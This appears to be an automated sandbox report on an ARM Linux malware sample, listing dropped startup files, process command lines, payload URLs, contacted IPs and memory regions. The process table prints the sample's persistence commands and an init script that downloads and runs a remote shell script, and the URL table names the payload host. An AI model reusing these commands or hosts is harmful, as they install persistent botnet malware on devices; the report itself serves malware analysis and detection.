Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm7.nn-20241122-0008.elf
|
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm7.nn-20241122-0008.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/run/user/127/dconf/user
|
very short file (no magic)
|
dropped
|
||
|
/tmp/qemu-open.699AIN (deleted)
|
ASCII text, with no line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm7.nn-20241122-0008.elf
|
/tmp/arm7.nn-20241122-0008.elf
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn-20241122-0008.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting
arm7.nn-20241122-0008.elf'\n /tmp/arm7.nn-20241122-0008.elf &\n wget eqqm7,,.60+.10+.+4-, -O /tmp/lol.sh\n chmod
+x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm7.nn-20241122-0008.elf'\n killall arm7.nn-20241122-0008.elf\n
;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n
;;\nesac\nexit 0\" > /etc/init.d/arm7.nn-20241122-0008.elf"
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "chmod +x /etc/init.d/arm7.nn-20241122-0008.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm7.nn-20241122-0008.elf
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
/bin/sh -c "ln -s /etc/init.d/arm7.nn-20241122-0008.elf /etc/rc.d/S99arm7.nn-20241122-0008.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm7.nn-20241122-0008.elf /etc/rc.d/S99arm7.nn-20241122-0008.elf
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm7.nn-20241122-0008.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/lib/systemd/systemd-user-runtime-dir
|
/lib/systemd/systemd-user-runtime-dir stop 127
|
There are 47 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.25
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
146.229.180.6
|
unknown
|
United States
|
||
|
57.98.44.160
|
unknown
|
Belgium
|
||
|
62.158.86.176
|
unknown
|
Germany
|
||
|
92.127.27.114
|
unknown
|
Russian Federation
|
||
|
216.122.192.38
|
unknown
|
Canada
|
||
|
144.46.28.115
|
unknown
|
United States
|
||
|
192.202.127.152
|
unknown
|
United States
|
||
|
195.108.62.76
|
unknown
|
Netherlands
|
||
|
34.34.233.103
|
unknown
|
United States
|
||
|
130.230.7.114
|
unknown
|
Finland
|
||
|
188.17.53.41
|
unknown
|
Russian Federation
|
||
|
90.32.128.232
|
unknown
|
France
|
||
|
99.186.82.153
|
unknown
|
United States
|
||
|
221.68.25.228
|
unknown
|
Japan
|
||
|
39.135.196.8
|
unknown
|
China
|
||
|
83.237.32.191
|
unknown
|
Russian Federation
|
||
|
7.121.118.251
|
unknown
|
United States
|
||
|
111.43.34.29
|
unknown
|
China
|
||
|
175.183.14.53
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
190.175.124.70
|
unknown
|
Argentina
|
||
|
88.73.198.115
|
unknown
|
Germany
|
||
|
40.151.164.43
|
unknown
|
United States
|
||
|
8.243.75.208
|
unknown
|
United States
|
||
|
3.35.139.240
|
unknown
|
United States
|
||
|
2.9.181.247
|
unknown
|
France
|
||
|
105.108.36.89
|
unknown
|
Algeria
|
||
|
35.130.105.227
|
unknown
|
United States
|
||
|
212.43.157.129
|
unknown
|
Switzerland
|
||
|
111.37.252.9
|
unknown
|
China
|
||
|
166.198.100.222
|
unknown
|
United States
|
||
|
222.57.36.53
|
unknown
|
China
|
||
|
74.121.144.68
|
unknown
|
United States
|
||
|
183.183.174.126
|
unknown
|
Japan
|
||
|
155.130.29.239
|
unknown
|
United States
|
||
|
32.22.70.208
|
unknown
|
United States
|
||
|
9.134.175.221
|
unknown
|
United States
|
||
|
187.213.128.192
|
unknown
|
Mexico
|
||
|
172.205.37.103
|
unknown
|
United States
|
||
|
186.87.243.57
|
unknown
|
Colombia
|
||
|
189.232.201.35
|
unknown
|
Mexico
|
||
|
85.217.172.231
|
unknown
|
Switzerland
|
||
|
141.160.236.119
|
unknown
|
United States
|
||
|
133.96.87.248
|
unknown
|
Japan
|
||
|
146.45.50.149
|
unknown
|
United States
|
||
|
165.187.237.2
|
unknown
|
Australia
|
||
|
66.0.198.126
|
unknown
|
United States
|
||
|
178.116.63.247
|
unknown
|
Belgium
|
||
|
160.73.70.233
|
unknown
|
United States
|
||
|
150.58.110.188
|
unknown
|
Japan
|
||
|
119.176.99.248
|
unknown
|
China
|
||
|
4.243.81.160
|
unknown
|
United States
|
||
|
223.210.75.203
|
unknown
|
China
|
||
|
43.116.196.102
|
unknown
|
Japan
|
||
|
145.208.20.42
|
unknown
|
Netherlands
|
||
|
36.227.121.137
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
162.217.159.199
|
unknown
|
United States
|
||
|
179.85.93.196
|
unknown
|
Brazil
|
||
|
9.110.117.223
|
unknown
|
United States
|
||
|
123.23.95.241
|
unknown
|
Viet Nam
|
||
|
57.55.220.124
|
unknown
|
Belgium
|
||
|
117.129.174.210
|
unknown
|
China
|
||
|
178.150.231.17
|
unknown
|
Ukraine
|
||
|
70.12.5.6
|
unknown
|
United States
|
||
|
33.173.139.86
|
unknown
|
United States
|
||
|
85.153.0.11
|
unknown
|
Estonia
|
||
|
24.97.20.251
|
unknown
|
United States
|
||
|
102.75.63.125
|
unknown
|
Morocco
|
||
|
85.144.252.53
|
unknown
|
Netherlands
|
||
|
48.239.50.244
|
unknown
|
United States
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
6.43.84.88
|
unknown
|
United States
|
||
|
92.163.219.51
|
unknown
|
France
|
||
|
205.244.113.50
|
unknown
|
United States
|
||
|
27.32.242.33
|
unknown
|
Australia
|
||
|
208.77.191.16
|
unknown
|
United States
|
||
|
101.140.231.5
|
unknown
|
Japan
|
||
|
35.93.143.102
|
unknown
|
United States
|
||
|
89.49.165.242
|
unknown
|
Germany
|
||
|
200.83.48.73
|
unknown
|
Chile
|
||
|
211.171.23.80
|
unknown
|
Korea Republic of
|
||
|
136.175.72.222
|
unknown
|
Reserved
|
||
|
14.123.91.243
|
unknown
|
China
|
||
|
113.85.179.243
|
unknown
|
China
|
||
|
46.183.162.134
|
unknown
|
Russian Federation
|
||
|
128.196.252.170
|
unknown
|
United States
|
||
|
134.95.4.166
|
unknown
|
Germany
|
||
|
73.220.2.173
|
unknown
|
United States
|
||
|
45.24.101.133
|
unknown
|
United States
|
||
|
129.32.92.131
|
unknown
|
United States
|
||
|
78.165.143.49
|
unknown
|
Turkey
|
||
|
176.120.187.145
|
unknown
|
Russian Federation
|
||
|
64.101.105.174
|
unknown
|
United States
|
||
|
28.153.42.170
|
unknown
|
United States
|
||
|
82.24.55.36
|
unknown
|
United Kingdom
|
||
|
192.79.74.89
|
unknown
|
United States
|
||
|
198.31.36.160
|
unknown
|
United States
|
||
|
219.44.11.85
|
unknown
|
Japan
|
||
|
65.48.40.43
|
unknown
|
United States
|
||
|
213.85.203.216
|
unknown
|
Russian Federation
|
||
|
214.82.18.0
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f9e54036000
|
page execute read
|
|
||
|
7f9e54036000
|
page execute read
|
|
||
|
7f9f5997c000
|
page read and write
|
|||
|
7f9f5a62d000
|
page read and write
|
|||
|
7f9f5a0d8000
|
page read and write
|
|||
|
7f9f5a2ba000
|
page read and write
|
|||
|
7ffd565e6000
|
page execute read
|
|||
|
7ffd565dd000
|
page read and write
|
|||
|
55ee7b970000
|
page read and write
|
|||
|
7f9f54021000
|
page read and write
|
|||
|
7f9f5a5e8000
|
page read and write
|
|||
|
7f9f53fff000
|
page read and write
|
|||
|
7f9f53fff000
|
page read and write
|
|||
|
7f9f59cde000
|
page read and write
|
|||
|
7f9f5a0d8000
|
page read and write
|
|||
|
7f9f5997c000
|
page read and write
|
|||
|
7f9e54044000
|
page read and write
|
|||
|
7f9f5a5c4000
|
page read and write
|
|||
|
7f9f59f6c000
|
page read and write
|
|||
|
7f9f5a5e8000
|
page read and write
|
|||
|
55ee7d985000
|
page read and write
|
|||
|
7f9f598ea000
|
page read and write
|
|||
|
7f9f590e2000
|
page read and write
|
|||
|
7f9f598ea000
|
page read and write
|
|||
|
7f9f59f49000
|
page read and write
|
|||
|
55ee7e9e4000
|
page read and write
|
|||
|
7f9f54021000
|
page read and write
|
|||
|
55ee7b970000
|
page read and write
|
|||
|
7f9f5a49b000
|
page read and write
|
|||
|
55ee7b716000
|
page execute read
|
|||
|
7f9f5a5c4000
|
page read and write
|
|||
|
55ee7d96e000
|
page execute and read and write
|
|||
|
7f9e5403f000
|
page read and write
|
|||
|
7f9f5a49b000
|
page read and write
|
|||
|
7f9e5403f000
|
page read and write
|
|||
|
7f9f59cde000
|
page read and write
|
|||
|
7f9f5a2ba000
|
page read and write
|
|||
|
7f9e54044000
|
page read and write
|
|||
|
7f9f59f49000
|
page read and write
|
|||
|
55ee7d96e000
|
page execute and read and write
|
|||
|
7f9f59f6c000
|
page read and write
|
|||
|
55ee7b967000
|
page read and write
|
|||
|
7f9f590e2000
|
page read and write
|
|||
|
7ffd565dd000
|
page read and write
|
|||
|
7ffd565e6000
|
page execute read
|
|||
|
55ee7b967000
|
page read and write
|
|||
|
7f9e54049000
|
page read and write
|
|||
|
55ee7d985000
|
page read and write
|
|||
|
7f9f5a62d000
|
page read and write
|
|||
|
55ee7b716000
|
page execute read
|
|||
|
55ee7e9e4000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.